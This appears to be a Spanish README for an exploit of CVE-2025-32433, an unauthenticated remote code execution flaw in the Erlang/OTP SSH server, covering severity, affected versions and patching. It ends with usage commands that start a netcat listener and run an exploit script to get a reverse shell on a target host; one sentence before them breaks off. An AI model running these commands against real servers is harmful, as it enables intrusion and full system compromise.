
Resumen de CVE-2025-32433 y Visión General del Ataque
Resumen y descripción general del ataque de CVE-2025-32433
CVE-2025-32433 es una vulnerabilidad crítica de ejecución remota de código (RCE) no autenticada en el servidor SSH de Erlang/OTP, divulgada el 16 de abril de 2025. Erlang/OTP SSH es una biblioteca utilizada en diversas aplicaciones distribuidas y de telecomunicaciones. La falla surge del manejo inadecuado de los mensajes del protocolo SSH: el servidor no aplica la secuencia de autenticación normal, lo que permite a un atacante enviar mensajes SSH especialmente diseñados antes de la autenticación. Al hacerlo, el atacante puede inyectar y ejecutar código Erlang arbitrario en el servidor nvd.nist.gov offsec.com . En términos prácticos, esto significa que un atacante con acceso de red a un servidor SSH de Erlang/OTP vulnerable (que a menudo se ejecuta como root) puede desencadenar una reverse shell o ejecutar comandos sin credenciales, lo que lleva a un compromiso total del sistema nvd.nist.gov offsec.com . Esta vulnerabilidad tiene asignado un CVSS 10.0 (severidad máxima) offsec.com .
Las versiones afectadas son todas las versiones de Erlang/OTP inferiores a OTP-27.3.3, OTP-26.2.5.11 u OTP-25.3.2.20 (las versiones parcheadas) nvd.nist.gov offsec.com . Los sistemas afectados suelen incluir servidores Linux o dispositivos que ejecutan un daemon SSH basado en Erlang (que no debe confundirse con OpenSSH). Es importante destacar que los servidores OpenSSH predeterminados en Linux/BSD no son vulnerables offsec.com . Los usuarios deben asumir que cualquier servidor SSH de Erlang/OTP expuesto está afectado y aplicar los parches oficiales o deshabilitar el servicio SSH de inmediato.
El ataque funciona iniciando una conexión SSH y luego enviando una secuencia de mensajes SSH fuera de orden. :
uso:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
ejemplo:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555